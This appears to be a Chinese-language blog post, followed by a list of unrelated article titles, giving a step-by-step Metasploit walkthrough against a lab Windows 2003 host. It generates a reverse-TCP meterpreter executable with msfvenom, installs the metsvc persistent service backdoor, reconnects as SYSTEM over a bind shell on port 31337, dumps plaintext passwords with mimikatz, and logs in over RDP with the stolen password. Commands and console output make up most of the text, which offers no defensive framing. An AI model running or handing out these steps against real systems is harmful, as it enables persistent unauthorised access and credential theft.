利用Metasploit建立持续性会话后门
来源:互联网 发布:java 分布式事务 编辑:程序博客网 时间:2024/06/06 19:00
环境
Kali 1.0 IP:192.168.0.7
windows 2003 IP:192.168.0.128
本次文章 讲解Metasploit维持会话 建立服务后门
首先先来生成一个 msf的exe后门
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test.exe //生成后门msf > useexploit/multi/handler //使用模块msf exploit(handler) > set lhostIP //设置kali的ip 不知道的可以ifconfig 查看一下msf exploit(handler) > run //监听
把后门拖到03主机 打开 上线后
shell 进入cmd
我们发现 这不是最高权限
接着我们 exit 退出
执行run metsvc -A
上传服务后门
meterpreter > run metsvc -ACreating a temporary installationdirectory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\VbqGppxISmg... >>Uploading metsrv.dll... >> Uploadingmetsvc-server.exe... >> Uploading metsvc.exe... Starting theservice... *Installing service metsvcCannot create service (0x00000431)Trying to connect to the Meterpreterservice at 192.168.0.128:31337...meterpreter >Meterpreter session 11 opened(192.168.0.7:54488 -> 192.168.0.128:31337) at 2017-03-18 19:08:18 +0800
我们会发现我们的msf后门已经掉线
接着我们启用另一个终端
msfconsole //打开msf
配置一下
msf > useexploit/multi/handler msf exploit(handler) > setpayload windows/metsvc_bind_tcp payload =>windows/metsvc_bind_tcpmsf exploit(handler) > set LPORT31337LPORT => 31337msf exploit(handler) > set RHOST192.168.0.128RHOST => 192.168.0.128
run //执行
成功上线
这里我们简单来说一下
meterpreter >Meterpreter session 11 opened(192.168.0.7:54488 -> 192.168.0.128:31337) at 2017-03-18 19:08:18 +0800
set LPORT 31337 是端口地址 监听的
set RHOST 192.168.0.128 是03主机的ip地址
run 执行
shell
我们可以看到 现在是c盘的cmd最高权限
meterpreter > shellProcess 3612 created.Channel 1 created.Microsoft Windows [�汾 5.2.3790](C) ��Ȩ���� 1985-2003Microsoft Corp.C:\WINDOWS\system32>whoamiwhoamint authority\systemC:\WINDOWS\system32>
Ctrl+c暂停
回显到meterpreter >
接着我们exit 退出
sessions -l
我们会看到已经维持控制了一台主机 也就是我的03主机
msf exploit(handler) > sessions -l Active sessions=============== Id Type Information Connection -- ---- ----------- ---------- 11 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINDOWS2003 192.168.0.7:54488 -> 192.168.0.128:31337 (192.168.0.128) msf exploit(handler) >
读取哈希值
对了 这里来说一下 Metasploit 有一款法国神器加载 读取明文密码
load mimikatz //加载
wdigest //读取用户密码
加载后 我们来help查看一下帮助
Mimikatz命令================= 命令说明 ------- ----------- kerberos尝试检索Kerberos凭据 livessp尝试检索livessp creds mimikatz_command运行自定义commannd msv尝试检索msv凭证(哈希值) ssp尝试检索ssp creds tspkg尝试检索tspkg凭据 wdigest尝试检索wdigest凭据
AuthID Package Domain User Password------ ------- ------ ---- --------0;999 NTLM WORKGROUP WINDOWS2003$ 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;51357 NTLM 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;199556 NTLM WINDOWS2003 Administrator admin
root@xaiSec:~# rdesktop 192.168.0.128 -u administrator -p admin
阅读全文
0 0
- 利用Metasploit建立持续性会话后门
- 启用会话持续性
- VoLTE技术中的会话持续性-ICS
- VoLTE技术中的会话持续性-SRVCC
- VoLTE技术中的会话持续性-eSRVCC
- Requests模块中持续性的 Cookie 会话
- VoLTE技术中的会话持续性-SRVCC
- VoLTE技术中的会话持续性-SRVCC
- Metasploit使用后门程序渗透Windows
- MS11-050 Metasploit 利用
- metasploit利用ms08_067
- kali 漏洞利用metasploit
- [原]使用python建立后门
- Meterpreter 建立持久后门 backdoor
- Metasploit应用笔记-msfvenom生成meterpreter后门代码
- 使用veil-evasion+metasploit生成基于python的后门软件
- 利用metasploit进行信息收集
- 利用Metasploit来攻击Mysql
- webservice的soap风格的接口发布流程
- eclipse没有(添加)”Dynamic Web Project”选项的方法
- HDU 1878 欧拉回路(概念)
- 关于Lazarus下PowerPDF控件的使用
- java线程同步与互斥
- 利用Metasploit建立持续性会话后门
- JavaScript基础教程笔记
- NOIP 2014 D1T3 飞扬的小鸟
- mybatis的第一个程序
- mysql插入和删除多条
- 《MySQL入门很简单》学习笔记(24)之自问自答(关键词:数据库/MySQL/外键/索引/联合查找/视图/触发器)
- 文件系统---文件系统的基本概念
- DECLARE_WORK
- sql之left join、right join、inner join的区别